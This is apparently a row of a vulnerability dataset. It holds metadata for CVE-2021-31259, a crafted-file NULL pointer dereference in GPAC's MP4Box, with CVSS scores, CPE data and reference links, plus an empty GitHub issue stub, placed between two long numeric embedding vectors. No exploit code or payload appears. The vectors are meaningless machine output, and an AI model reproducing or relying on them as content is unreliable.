-0.0030614587012678385, 0.029116706922650337, 0.020737582817673683, -0.010233643464744091, -0.011044526472687721, -0.02183377556502819, -0.0021830021869391203, 0.009632989764213562, 0.015391760505735874, 0.027570022270083427, -0.01077423244714737, 0.021443350240588188, -0.010398823767900467, 0.020617451518774033, 0.0025846895296126604, -0.002246821764856577, -0.006821177899837494, 0.0069225383922457695, -0.0046438067220151424, -0.014145403169095516, -0.007312963251024485, 0.01089436374604702, -0.016548020765185356, 0.012959111481904984, -0.005511001218110323, 0.017749328166246414, -0.016502970829606056, -0.004140758886933327, -0.0077184047549963, -0.009865743108093739, -0.011149641126394272, 0.026834221556782722, -0.010196102783083916, -0.0009713702602311969, 0.014220485463738441, 0.001648983103223145, 0.005101805552840233, -0.011344853788614273, -0.016217660158872604, 0.005619869567453861, 0.016668150201439857, 0.014610910788178444, -0.0037146699614822865, -0.0025602879468351603, 0.0031778353732079268, 0.022794822230935097, -0.014197960495948792, -0.013349536806344986, -0.008859647437930107, -0.028801362961530685, 0.002025330439209938, 0.016638118773698807, -0.00665224390104413, -0.017989588901400566, 0.012133212760090828, 0.010458889417350292, 0.011983049102127552, 0.00370716187171638, -0.007147783413529396, 0.01702854223549366, -0.009813185781240463, 0.009880759753286839, -0.006881243083626032, 0.008281517773866653, -0.002657894277945161, 0.007800994906574488, -0.004891576711088419, -0.018244868144392967, 0.01722375489771366, 0.005619869567453861, -0.007125258911401033, -0.0076132905669510365, 0.020617451518774033, 0.0002620822633616626, -0.016548020765185356, 0.0034162201918661594, 0.021398302167654037, -0.004242119379341602, 0.01692342944443226, 0.022524528205394745, 0.006738587748259306, 0.001251049805432558, 0.009925808757543564, 0.00021257523621898144, -0.005593590904027224, 0.003440621541813016, 0.003624571952968836, 0.011269772425293922, -0.019866634160280228, 0.006179228890687227, 0.019626371562480927, -0.00471138022840023, 0.003862956538796425, -0.017989588901400566, -0.02623356692492962, -0.004238365218043327, -0.009730596095323563, 0.0025321324355900288, 0.01726880483329296, 0.019596340134739876, -0.0005016400245949626, -0.01463343482464552, 0.012343441136181355, -0.010218627750873566, 0.0005673365667462349, -0.019326044246554375, 0.017343886196613312, -0.01005344744771719, 0.007147783413529396, 0.023665770888328552, -0.015887299552559853, 0.004756429698318243, -0.02166859619319439, -0.004118234384804964, -0.010639085434377193, -0.032014861702919006, 0.0052106743678450584, 0.013980223797261715, 0.02160852961242199, 0.0016433519776910543, -0.0016555527690798044, -0.007271668408066034, -0.028410937637090683, -0.006772374734282494, 0.0076057822443544865, 0.0007780347368679941, -0.005589837208390236, -0.01839503087103367, 0.02009187825024128, -0.006111655384302139, 0.015294154174625874, 0.012621243484318256, 0.030513226985931396, -0.00853679608553648, -0.01554192416369915, -0.005999032407999039, 0.0029019101057201624, -0.00507928105071187, -0.0009572924464009702, -0.01701352745294571, 0.020707549527287483, 0.01170524675399065, 0.009745612740516663, -0.0038479401264339685, -0.020557384938001633, 0.004362250212579966, 0.03294587507843971, 0.01689339615404606, 0.0001332701212959364, -0.005458443891257048, 0.006107901223003864, 0.01719372346997261, 0.002614722354337573, -0.010090988129377365, 0.005529771558940411, -0.010669117793440819, 0.004095709882676601, 0.01704355888068676, 0.005770033225417137, -0.0044373320415616035, 0.0025959517806768417, -0.006021557375788689, -0.005634886212646961, -0.010458889417350292, -0.02468688227236271, 0.0026503861881792545, -0.00327356462366879, 0.008281517773866653, 0.016743231564760208, 0.024386554956436157, -0.0014284304343163967, -0.01687837950885296, 0.012808947823941708, 0.0037015308625996113, -0.0068361940793693066, -0.036489736288785934, 0.010834298096597195, 0.0312640443444252, -0.00392302218824625, -0.002924434607848525, -0.01078924909234047, -0.017689263448119164, 0.000028346297767711803, 0.0008939421968534589, 0.0017512820195406675, 0.027089498937129974, -0.0018235482275485992, -0.007433094084262848, -0.025182422250509262, -0.004103218205273151, -0.013649864122271538, -0.027059465646743774, -0.012245834805071354, 0.010511446744203568, -0.0013336397241801023, 0.01995673216879368, -0.013071734458208084, 0.004204578697681427, -0.02162354625761509, 0.011615147814154625, 0.006933800410479307, 0.008964762091636658, -0.0029263116884976625, -0.012771407142281532, -0.001657429849728942, 0.008889680728316307, 0.008972270414233208, -0.018169786781072617, -0.01578218676149845, 0.015091434121131897, -0.0069187842309474945, 0.004775200039148331, 0.02309514954686165, -0.005856377072632313, -0.006276835221797228, 0.0026015830226242542, 0.003106507705524564, -0.009805677458643913, -0.02195390686392784, -0.04525928571820259, -0.01689339615404606, 0.006900013890117407, -0.01689339615404606, 0.0001430072879884392, -0.00943777710199356, 0.011254755780100822, -0.003087737364694476, -0.003652727697044611, -0.020707549527287483, 0.036429669708013535, 0.009738104417920113, 0.016382839530706406, -0.016307758167386055, 0.0008362230728380382, 0.01329697947949171, 0.007587011903524399, -0.015031368471682072, -0.008326566778123379, -0.014415698125958443, -0.02970234490931034, -0.003874218789860606, 0.017509065568447113, -0.010428856126964092, -0.013830060139298439, 0.00742183206602931, 0.008716992102563381, -0.019100800156593323, 0.008979778736829758, -0.008852139115333557, -0.014986319467425346, -0.02350059151649475, 0.017719294875860214, 0.013342028483748436, -0.020647484809160233, 0.03228515759110451, 0.018124736845493317, 0.006708555389195681, -0.01687837950885296, 0.00735801225528121, -0.02662399224936962, -0.025572847574949265, -0.0006762050907127559, -0.005803820211440325, -0.006716063246130943, -0.02503225952386856, 0.004305938724428415, -0.011855409480631351, 0.00210979743860662, 0.0027179596945643425, 0.021488400176167488, 0.00467008538544178, -0.007906109094619751, 0.02001679688692093, 0.0018141630571335554, -0.0051956577226519585, 0.0009427453624084592, 0.0029037869535386562, -0.018244868144392967, -0.0038179075345396996, -0.01710362546145916, 0.004459856543689966, 0.0012707588030025363, -0.0075269462540745735, -0.009167483076453209, -0.016382839530706406, 0.0014462623512372375, -0.0013186234282329679, -0.0051881494000554085, 0.02163856290280819, -0.010556495748460293, -0.012929079122841358, 0.02160852961242199, 0.010541479103267193, 0.0022130347788333893, 0.0035926622804254293, -0.011660197749733925, 0.02163856290280819, -0.01684834621846676, -0.014505796134471893, -0.015136483125388622, 0.013417110778391361, 0.0154518261551857, 0.0037935059517621994, -0.038051437586545944, -0.010488921776413918, -0.011968032456934452, 0.011945508420467377, -0.0009770013857632875, 0.02043725550174713, -0.01482113916426897, -0.005586083047091961, 0.01836499758064747, -0.011892951093614101, -0.014670975506305695, -0.00368276028893888, 0.005728738382458687, -0.009813185781240463, -0.0004293738165870309, -0.0056161158718168736, 0.0236057061702013, 0.01868034154176712, -0.004369758535176516, 0.011983049102127552, 0.01240350678563118, 0.011142132803797722, 0.007399307563900948, 0.007312963251024485, -0.004396037198603153, 0.0015138359740376472, -0.00027686398243531585, -0.006734834052622318, 0.0029432049486786127, -0.0036133097019046545, -0.0004903777735307813, 0.01472353283315897, -0.011510034091770649, -0.006828686222434044, -0.012463572435081005, -0.019551290199160576, 0.03255544975399971, 0.012238326482474804, 0.010346266441047192, 0.014303075149655342, -0.0007775654667057097, 0.011652689427137375, 0.0033279990311712027, -0.002464558696374297, 0.006945062894374132, -0.0016837085131555796, -0.005154362879693508, -0.006167966406792402, -0.005957737565040588, -0.0016339668072760105, -0.012981636449694633, -0.005090543534606695, 0.0004927240661345422, -0.018995685502886772, -0.006629719398915768, -0.016397856175899506, 0.02309514954686165, -0.013259438797831535, -0.015421793796122074, 0.0063068680465221405, -0.03612934425473213, -0.0074706352315843105, 0.007098980247974396, -0.02808057889342308, 0.008566828444600105, -0.028681231662631035, -0.006006540730595589, -0.0009117741137742996, 0.00106709951069206, -0.0010023415088653564, -0.013409602455794811, 0.00735801225528121, -0.025407668203115463, -0.0011581361759454012, 0.009047351777553558, -0.007155291736125946, -0.00021808904421050102, -0.004106972366571426, -0.01994171552360058, -0.004069431219249964, -0.014227993786334991, -0.0008779873023740947, 0.007035160902887583, 0.015857268124818802, -0.03606927767395973, 0.011615147814154625, 0.005646148230880499, -0.019746502861380577, 0.020632468163967133, -0.0015175900189206004, -0.0015279138460755348, -0.00924256443977356, 0.017599165439605713, 0.00846171472221613, -0.030107785016298294, -0.00353071978315711, 0.01016607042402029, 0.008807090111076832, -0.006573407910764217, -0.022509511560201645, 0.021188072860240936, 0.0070576854050159454, 0.00018641393398866057, -0.000016717423932277597, 0.0063781957142055035, 0.027524972334504128, -0.0070576854050159454, 0.03597917780280113, -0.005597345065325499, 0.024431604892015457, -0.012140720151364803, -0.003594539361074567, -0.005991524551063776, 0.005101805552840233, -0.008844631724059582, -0.017449000850319862, -0.0019558798521757126, -0.013499700464308262, -0.006426998879760504, -0.006408228073269129, -0.006640981882810593, -0.01570710353553295, -0.005507247056812048, 0.0017831918084993958, -0.015917332842946053, 0.0017756836023181677, 0.005150608718395233, 0.007883585058152676, 0.03294587507843971, -0.009685547091066837, -0.010939412750303745, 0.012230819091200829, 0.03378679230809212, 0.019716469570994377, 0.005661164876073599, -0.014513304457068443, -0.003904251614585519, 0.0039530545473098755, -0.010023415088653564, -0.0057925577275455, 0.00040356445242650807, 0.011480000801384449, 0.016187626868486404, -0.01889057084918022, 0.007928634062409401, -0.005845115054398775, -0.008724500425159931, 0.025858158245682716, -0.02348557487130165, 0.011367378756403923, -0.001326131634414196, -0.0064307525753974915, 0.008934729732573032, 0.03102378360927105, -0.016247693449258804, 0.009099909104406834, -0.010226136073470116, 0.0062880972400307655, -0.018019622191786766, -0.0025133618619292974, -0.028846412897109985, 0.0030483193695545197, 0.01178783643990755, 0.03078352101147175, -0.015324187465012074, -0.011847902089357376, 0.017794376239180565, -0.0026128452736884356, 0.012853997759521008, 0.0008564013405703008, 0.0027855332009494305, 0.002892524702474475, 0.008056272752583027, -0.02509232424199581, -0.0046475608833134174, -0.004741413053125143, -0.00037165472167544067, -0.0005715598817914724, 0.0020609942730516195, 0.01851516216993332, 0.0039155138656497, -0.0022355595137923956, 0.017854442819952965, 0.0038216616958379745, -0.00015661586076021194, 0.03727058693766594, 0.0009770013857632875, -0.002710451604798436, -0.003005147445946932, 0.015361728146672249, 0.0078160110861063, 0.00431720120832324, -0.0019427405204623938, -0.002004683017730713, 0.003986841533333063, 0.0024514193646609783, 0.005368345882743597, -0.02040722221136093, 0.00846171472221613, -0.0008366923430003226, -0.00861187744885683, -0.01175780314952135, 0.024071212857961655, -0.023650754243135452, 0.015887299552559853, 0.007988699711859226, -0.0013336397241801023, -0.00946781039237976, 0.004347234033048153, -0.019656404852867126, 0.025182422250509262, 0.0008625017362646759, -0.0022130347788333893, -0.0031665731221437454, 0.004283414222300053, 0.010488921776413918, -0.004407299216836691, -0.009903283789753914, -0.001004218589514494, -0.007429339922964573, -0.0033993266988545656, -0.014806123450398445, 0.000860155385453254, -0.0007822581101208925, -0.0029525901190936565, 0.02306511625647545, -0.011525049805641174, 0.00864941906183958, -0.02636871486902237, 0.019836600869894028, -0.002862492110580206, -0.02642877958714962, 0.011502525769174099, -0.003829169785603881, 0.003919268026947975, 0.010931904427707195, -0.018965652212500572, -0.016457920894026756, 0.029056640341877937, -0.010113513097167015, -0.0024758209474384785, 0.016322774812579155, -0.005916442722082138, -0.0026184762828052044, -0.001409660093486309, 0.007448110729455948, -0.007031406741589308, -0.010579019784927368, 0.02464183419942856, -0.016412872821092606, 0.001133734593167901, 0.024341506883502007, 0.009220040403306484, -0.028951527550816536, 0.006137934047728777, -0.027104515582323074, -0.012140720151364803, 0.005766279064118862, 0.023770885542035103, -0.005034232046455145, -0.009002302773296833, -0.015241596847772598, -0.02151843160390854, -0.008912204764783382, 0.016803298145532608, -0.001485680346377194, 0.024416588246822357, -0.00656965421512723, 0.02013692818582058, 0.012989144772291183, -0.0076696015894412994, 0.01717870682477951, -0.009572924114763737, -0.0075419628992676735, 0.0005701521295122802, -0.012230819091200829, -0.0024044932797551155, 0.0004709034110419452, -0.016127562150359154, 0.0017428353894501925, -0.0038179075345396996, 0.02800549566745758, 0.013747470453381538, 0.009550400078296661, -0.02187882550060749, -0.0068474565632641315, -0.008086305111646652, -0.005503492895513773, 0.025452716276049614, 0.013266947120428085, 0.013724945485591888, 0.015361728146672249, 0.025422682985663414, 0.0005068018799647689, 0.00944528542459011, 0.026684056967496872, 0.001791638438589871, -0.024371540173888206, -0.006318130064755678, -0.016743231564760208, 0.033456433564424515, 0.006182983051985502, 0.006280589383095503, 0.009482826106250286, 0.02651887759566307, -0.015061400830745697, 0.01078174076974392, 0.0023988622706383467, -0.0016011184779927135, 0.009054860100150108, -0.022629642859101295, 0.012373474426567554, 0.0052031660452485085, -0.03417721763253212, 0.018274899572134018, 0.013807536102831364, -0.033336300402879715, 0.014152911491692066, 0.008086305111646652, 0.007861060090363026, -0.0015241596847772598, 0.003645219374448061, -0.000008424701263720635, 0.012681309133768082, 0.010030923411250114, -0.03603924438357353, 0.016487954184412956, -0.0003345831064507365, -0.0004314855032134801, -0.0019971749279648066, -0.012073147110641003, 0.0233354102820158, -0.0011290420079603791, 0.009910792112350464, 0.005893918219953775, 0.0001698724809102714, 0.006325638387352228, -0.005976507905870676, 0.005000445060431957, 0.0008057211525738239, 0.013634847477078438, 0.010706659406423569, -0.004681347869336605, 0.004065677523612976, 0.024356523528695107, -0.012733866460621357, 0.018079686909914017, -0.01877043955028057, 0.0013167463475838304, 0.006254310719668865, -0.021203089505434036, 0.01400274783372879, -0.009099909104406834, -0.011862917803227901, -0.015279138460755348, -0.017899490892887115, -0.001875166897661984, -0.019100800156593323, -0.019235946238040924, -0.007958666421473026, -0.03462770953774452, -0.012343441136181355, 0.0024927144404500723, -0.009114925749599934, -0.001786945853382349, -0.016683166846632957, -0.011367378756403923, -0.0004894392332062125, 0.006059098057448864, 0.017479034140706062, -0.014400681480765343, -0.005518509540706873, -0.0040243822149932384, 0.000556543527636677, -0.004493643529713154, -0.0016733846860006452, -0.002124813850969076, 0.021158039569854736, -0.00932515412569046, 0.0020947810262441635, 0.02644379623234272, -0.012568686157464981, -0.01710362546145916, -0.017689263448119164, -0.006130425725132227, 0.0007648954051546752, -0.02663900889456272, 0.0034837936982512474, -0.02465685084462166, 0.0004866236704401672, 0.00855181273072958, 0.0003883134631905705, -0.0009676161571405828, 0.006746096070855856, 0.01851516216993332, -0.0008958192192949355, -0.007196586579084396, 0.02955218032002449, -0.00943777710199356, -0.0013739962596446276, -0.0017372042639181018, -0.016623102128505707, -0.004790216218680143, 0.0007775654667057097, -0.0075344545766711235, 0.013056717813014984, 0.015151498839259148, -0.0027892873622477055, -0.016172610223293304, 0.0075382087379693985, 0.0016827699728310108, 0.008814598433673382, 0.01836499758064747, -0.012365966103971004, 0.013469668105244637, -0.0016752617666497827, 0.008814598433673382, 0.022209184244275093, -0.004947888199239969, -0.0007353319670073688, 0.008604370057582855, -0.008394140750169754, 0.024296456947922707, -0.01086433045566082, 0.0034669002052396536, 0.008123846724629402, -0.00656965421512723, 0.001812285976484418, -0.017554115504026413, -0.01319937314838171, -0.0070576854050159454, -0.0038141533732414246, -0.006408228073269129, 0.00936269573867321, -0.0008427927386946976, 0.006517096888273954, 0.00995584111660719, 0.011149641126394272, -0.007684618234634399, 0.0033336300402879715, -0.014580877497792244, -0.000751286861486733, 0.005409640725702047, -0.010256168432533741, -0.00580006605014205, -0.009700563736259937, 0.016022447496652603, -0.0015204056398943067, -0.010744200088083744, -0.02033214084804058, 0.011712754145264626, -0.02013692818582058, -0.01391264982521534, -0.03252542018890381, 0.016517987474799156, 0.0015138359740376472, 0.018034638836979866, 0.0046438067220151424, 0.017494050785899162, -0.0006818362162448466, -0.035168297588825226, 0.006404473911970854, -0.02010689489543438, 0.017989588901400566, -0.01319937314838171, -0.021398302167654037, -0.0014040289679542184, 0.01713365688920021, -0.013627339154481888, 0.00106709951069206, -0.014115370810031891, -0.007080209907144308, 0.024476652964949608, 0.01880047284066677, 0.010669117793440819, -0.011780328117311, 0.007966174744069576, 0.009092400781810284, 0.023906031623482704, 0.00294508202932775, 0.009775645099580288, 0.002091027097776532, 0.025557830929756165, 0.0021642318461090326, 0.011885442771017551, 0.013537241145968437, 0.03558875247836113, 0.0037766124587506056, 0.031654469668865204, -0.007988699711859226, 0.00625055655837059, -0.018169786781072617, 0.020992860198020935, 0.013837568461894989, 0.02620353363454342, 0.010616560466587543, -0.008048764429986477, -0.006532113067805767, -0.0019859124440699816, 0.03273564577102661, 0.000600184837821871, -0.007943649776279926, -0.029116706922650337, 0.0013420864706858993, -0.00015462150622624904, -0.008266502059996128, -0.004193316213786602, -0.013875109143555164, -0.0057437545619904995, -0.008003715425729752, -0.01157760713249445, -0.010263676755130291, 0.026729106903076172, 0.0018817365635186434, 0.003986841533333063, 0.013965207152068615, 0.041294969618320465, -0.010308725759387016, -0.010654102079570293, 0.0004399321915116161, 0.010473905131220818, -0.002034715609624982, -0.012763898819684982, 0.009640498086810112, 0.0031778353732079268, -0.0026128452736884356, 0.007951158098876476, -0.02311016619205475, -0.0009910792578011751, -0.0011281034676358104, 0.009227548725903034, 0.001715618185698986, 0.003063335781916976, 0.017734311521053314, 0.021443350240588188, 0.03096371702849865, -0.003209745278581977, -0.003877972951158881, -0.001238849014043808, -0.011239739134907722, -0.014055305160582066, 0.030197883024811745, 0.003618940943852067, 0.00032425933750346303, 0.015692088752985, 0.014768581837415695, 0.017599165439605713, -0.01877043955028057, 0.034988101571798325, -0.021022893488407135, -0.006930046249181032, 0.013342028483748436, -0.011172166094183922, 0.01850014552474022, 0.01854519546031952, -0.00431720120832324, 0.0035006869584321976, -0.008814598433673382, 0.014227993786334991, -0.0046475608833134174, 0.012853997759521008, 0.005965245887637138, -0.03985339775681496, -0.0001776152930688113, -0.005154362879693508, 0.018109720200300217, 0.014603402465581894, -0.0009863866725936532, -0.010473905131220818, -0.01875542290508747, 0.029146738350391388, 0.03742074966430664, 0.005732492543756962, 0.0015382375568151474, -0.006415736395865679, 0.00925758108496666, -0.014077830128371716, -0.020557384938001633, 0.009940825402736664, 0.001870474312454462, -0.0074668810702860355, -0.002620353363454342, -0.0015560694737359881, 0.006697292905300856, 0.01466346811503172, -0.0024758209474384785, -0.000705299258697778, 0.023035084828734398, 0.02618851698935032, -0.011119608767330647, 0.01482113916426897, 0.008221453055739403, -0.023936064913868904, 0.019025718793272972, -0.004947888199239969, 0.002233682433143258, 0.01077423244714737, 0.013492192141711712, -0.0314142070710659, -0.02305009961128235, -0.010714166797697544, 0.002259960863739252, 0.002552779857069254, -0.01330448780208826, -0.017539098858833313, -0.013732453808188438, -0.009693055413663387, -0.023620720952749252, 0.002627861686050892, -0.003594539361074567, 0.027029434219002724, -0.013965207152068615, -0.00008517086826032028, 0.009580432437360287, 0.0017756836023181677, -0.004944134037941694, -0.0039680711925029755, -0.00018793903291225433, 0.0010286200558766723, -0.0009816939709708095, -0.0012829595943912864, 0.013379569165408611, 0.004144513048231602, -0.0154368095099926, -0.004148267209529877, -0.003994349855929613, 0.015421793796122074, 0.009280105121433735, 0.009167483076453209, 0.011059543117880821, -0.005522263236343861, 0.00310463085770607, 0.01249360479414463, -0.0012519883457571268, 0.02195390686392784, 0.013777502812445164, 0.008123846724629402, 0.0037935059517621994, -0.004876560531556606, -0.002706697443500161, 0.00924256443977356, 0.007140275556594133, -0.019190898165106773, -0.004474872723221779, 0.013266947120428085, -0.0008155755931511521, 0.003277318784967065, -0.006100392900407314, -0.006205507554113865, 0.0034331134520471096, 0.018064672127366066, 0.004914101213216782, -0.019326044246554375, -0.0007076456095091999, 0.0020778877660632133, -0.002177370944991708, 0.004238365218043327, -0.016427889466285706, -0.009490334428846836, -0.002104166429489851, 0.008131355047225952, 0.009828202426433563, -0.013372061774134636, -0.02944706566631794, 0.016217660158872604, 0.019566306844353676, 0.017464017495512962, -0.01850014552474022, -0.003754087956622243, 0.01723877154290676, -0.024281440302729607, 0.0026672794483602047, 0.006528358906507492, 0.005458443891257048, 0.01853017881512642, -0.01877043955028057, 0.033546529710292816, 0.0064420150592923164, 0.01859024353325367, 0.020947810262441635, -0.0029263116884976625, 0.016517987474799156, 0.0016264586010947824, 0.013882617466151714, -0.005278247874230146, 0.0007996207568794489, -0.025512782856822014, 0.007125258911401033, -0.01464094314724207, -0.0017024788539856672, -0.001468786969780922, 0.008349091745913029, 0.01690841279923916, 0.0024364031851291656, -0.001963387941941619, -0.01015105377882719, -0.002607214031741023, -0.005803820211440325, 0.008822106756269932, -0.02159351482987404, 0.0028549840208142996, 0.005766279064118862, -0.00124354159925133, 0.010406332090497017, -0.0009474379476159811, 0.053338080644607544, 0.022089052945375443, 0.02949211560189724, 0.002821197034791112, -0.0005635824636556208, -0.011885442771017551, -0.016367822885513306, -0.004204578697681427, -0.013034193776547909, -0.0027461154386401176, 0.006400720216333866, 0.0004969473811797798, 0.007921125739812851, 0.0030370571184903383, -0.017944540828466415, -0.006975095719099045, -0.0004594065248966217, 0.007275422569364309, 0.007951158098876476, -0.00426839804276824, -0.001598302973434329, 0.01004593912512064, 0.03078352101147175, -0.00231064110994339, 0.015902316197752953, 0.0078160110861063, 0.007496913895010948, 0.009910792112350464, 0.024461638182401657, -0.006081622559577227, 0.015143990516662598, -0.0029075411148369312, -0.001506327767856419, 0.0064420150592923164, 0.016322774812579155, 0.011998064815998077, -0.006505834404379129, 0.02470189891755581, -0.013409602455794811, 0.007677109912037849, 0.026759138330817223, 0.0045874956995248795, -0.016683166846632957, 0.011915475130081177, 0.0034537608735263348, 0.0051205758936703205, 0.009873251430690289, -0.0036677438765764236, 0.016202643513679504, -0.00467008538544178, 0.006010294891893864, -0.0013824428897351027, -0.0012125704670324922, 0.002866246271878481, -0.001707171555608511, -0.0014293689746409655, 0.003296089358627796, -0.015406777150928974, -0.011922983452677727, -0.009805677458643913, -0.009850726462900639, -0.014558353461325169, 0.0019023841014131904, -0.0062993597239255905, -0.01989666558802128, 0.012756391428411007, -0.012598719447851181, 0.024056196212768555, -0.02015194483101368, 0.009054860100150108, 0.015932349488139153, -0.01719372346997261, -0.01485117245465517, -0.004155775532126427, -0.007639569230377674, -0.01018108706921339, 0.024131277576088905, -0.01883050613105297, -0.0035044411197304726, -0.0007648954051546752, -0.019055750221014023, -0.012110687792301178, 0.006817423738539219, 0.0009694932377897203, 0.011712754145264626, -0.0037371946964412928, -0.019145848229527473, -0.0044260695576667786, -0.006107901223003864, 0.026038354262709618, -0.008296534419059753, 0.006817423738539219, -0.008033748716115952, -0.00019016802252735943, -0.009212532080709934, 0.003945546690374613, 0.0077184047549963, 0.03219505771994591, -0.003911759704351425, 0.014933762140572071, -0.012801440432667732, -0.0029732377734035254, -0.014543336816132069, -0.005345821380615234, -0.006269326899200678, -0.003110261866822839, -0.0016302127623930573, -0.017554115504026413, 0.004478626884520054, -0.0010652224300429225, -0.008349091745913029, 0.008807090111076832, -0.008484238758683205, 0.010721675120294094, 0.01087183877825737, -0.0015419916016981006, -0.020527353510260582, 0.01320688147097826, 0.009122434072196484, 0.0078460443764925, 0.0032998432870954275, -0.017839426174759865, 0.04075437784194946, 0.0016461675986647606, -0.0025321324355900288, -0.015196547843515873, 0.0008165141334757209, 0.024356523528695107, 0.01309425849467516, -0.010308725759387016, -0.011885442771017551, -0.0014781721401959658, 0.004932871554046869, 0.010811773128807545, -0.006487064063549042, 0.025527797639369965, -0.006967587396502495, 0.0003937099827453494, 0.000544342736247927, 0.009400236420333385, -0.0036564816255122423, 0.047121312469244, 0.0034124660305678844, -0.005582328885793686, -0.0005377731285989285, 0.009490334428846836, -0.024071212857961655, 0.005642394069582224, 0.010669117793440819, -0.005248215049505234, 0.017358902841806412, -0.0027555006090551615, 0.011389902792870998, 0.006351917050778866, -0.004182054195553064, 0.022509511560201645, 0.004700118210166693, 0.010226136073470116, -0.019506242126226425, 0.0031496798619627953, 0.007508175913244486, 0.0115700988098979, 0.0011731524718925357, 0.002066625514999032, 0.01180285308510065, 0.0051243300549685955, -0.0017634828109294176, 0.00043852441012859344, 0.01847011223435402, -0.018965652212500572, -0.011637672781944275, -0.007996207103133202, 0.004557462874799967, 0.006727325730025768, 0.010376298800110817, -0.003035180037841201, 0.001381504349410534, -0.0014209223445504904, 0.02175869420170784, 0.03721052035689354, 0.03606927767395973, 0.006479555740952492, -0.013724945485591888, 0.010526462458074093, 0.007327979896217585, -0.028350872918963432, -0.01874040812253952, -0.01008348073810339, 0.00463629886507988, -0.006674768403172493, -0.012238326482474804, -0.009925808757543564, 0.0233504269272089, 0.007594520226120949, -0.008213944733142853, 0.015226581133902073, 0.01689339615404606, -0.0038667107000947, 0.022629642859101295, -0.020602434873580933, -0.002314395271241665, -0.01328947115689516, 0.00014899036614224315, -0.001636782311834395 ]
2,057
CVE-2021-31259
2021-04-19T19:15:18.373000
The gf_isom_cenc_get_default_info_internal function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/3b84ffcbacf144ce35650df958432f472b6483f8" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1735" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1735
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in MP4Box gf_isom_cenc_get_default_info_internal
https://api.github.com/repos/gpac/gpac/issues/1735/comments
0
2021-04-08T07:10:40
2023-09-22T06:08:25Z
https://github.com/gpac/gpac/issues/1735
853,144,448
1,735
true
This is a GitHub Issue repo:gpac owner:gpac Title : null dereference in MP4Box gf_isom_cenc_get_default_info_internal Issue date: --- start body --- None --- end body ---
172
[ -0.016495589166879654, 0.045071206986904144, -0.003931916318833828, 0.03166208043694496, 0.015461846254765987, 0.0034722699783742428, -0.019700193777680397, 0.050092246383428574, 0.0019345767796039581, 0.013003014028072357, -0.028649456799030304, 0.010293129831552505, 0.010832153260707855, 0.007546326145529747, -0.0003650406142696738, 0.027837229892611504, -0.01723397709429264, 0.0031123056542128325, -0.002678502816706896, -0.005936639849096537, 0.04569145292043686, -0.030111465603113174, -0.0072952741757035255, 0.029299238696694374, -0.0012847952311858535, 0.016008254140615463, -0.037569183856248856, 0.01396291796118021, 0.006028938572853804, 0.009960855357348919, 0.01717490702867508, 0.0065901135094463825, -0.0004229579062666744, 0.030332982540130615, 0.06574607640504837, -0.014597931876778603, 0.041083913296461105, 0.04820197448134422, -0.0070331464521586895, 0.00996823888272047, -0.005390232894569635, -0.04471678286790848, -0.03127811849117279, 0.023214921355247498, 0.006051090080291033, 0.023643186315894127, 0.009872248396277428, 0.004607541486620903, -0.029963787645101547, -0.005371773149818182, 0.03266628831624985, -0.025385782122612, -0.014642235822975636, -0.0578010194003582, -0.006479355506598949, -0.05062388628721237, 0.03284350037574768, 0.0051797921769320965, -0.013918614946305752, 0.03219372034072876, -0.010241442359983921, 0.028487011790275574, -0.016761409118771553, 0.021782448515295982, 0.0042752670124173164, 0.04654798284173012, -0.005619133356958628, 0.021575698629021645, -0.006826397497206926, 0.02306724339723587, 0.014405950903892517, -0.019434373825788498, -0.005342237651348114, 0.02922539971768856, 0.005464071873575449, -0.04855639860033989, 0.04876314848661423, 0.03423167020082474, -0.01328360103070736, 0.016392214223742485, -0.04202904924750328, 0.007716155145317316, -0.02532671019434929, 0.011600076220929623, 0.003084616269916296, -0.003319054376333952, -0.025356246158480644, -0.07643793523311615, -0.029240166768431664, -0.01857784390449524, 0.02042381465435028, 0.034113530069589615, -0.008690827526152134, -0.001774900360032916, 0.006545810028910637, -0.002671118825674057, -0.0004970274749211967, -0.012249858118593693, -0.029151560738682747, -0.020512420684099197, -0.029830878600478172, -0.03721475973725319, 0.014841600321233273, 0.011459782719612122, -0.004434020258486271, 0.01680571213364601, 0.04944246634840965, -0.013623259961605072, 0.008240411058068275, 0.14944975078105927, 0.002759725321084261, -0.02359888330101967, -0.007254662923514843, 0.0006230149301700294, 0.016111627221107483, 0.04409653693437576, -0.03541309013962746, -0.02359888330101967, -0.0036162554752081633, -0.035678911954164505, -0.017588403075933456, -0.019434373825788498, -0.014420718885958195, 0.011998806148767471, -0.02365795336663723, 0.043299075216054916, -0.03464516997337341, 0.010152836330235004, -0.01352726947516203, -0.004345413763076067, -0.04660705476999283, -0.00037380895810201764, 0.01766224205493927, -0.01326144952327013, 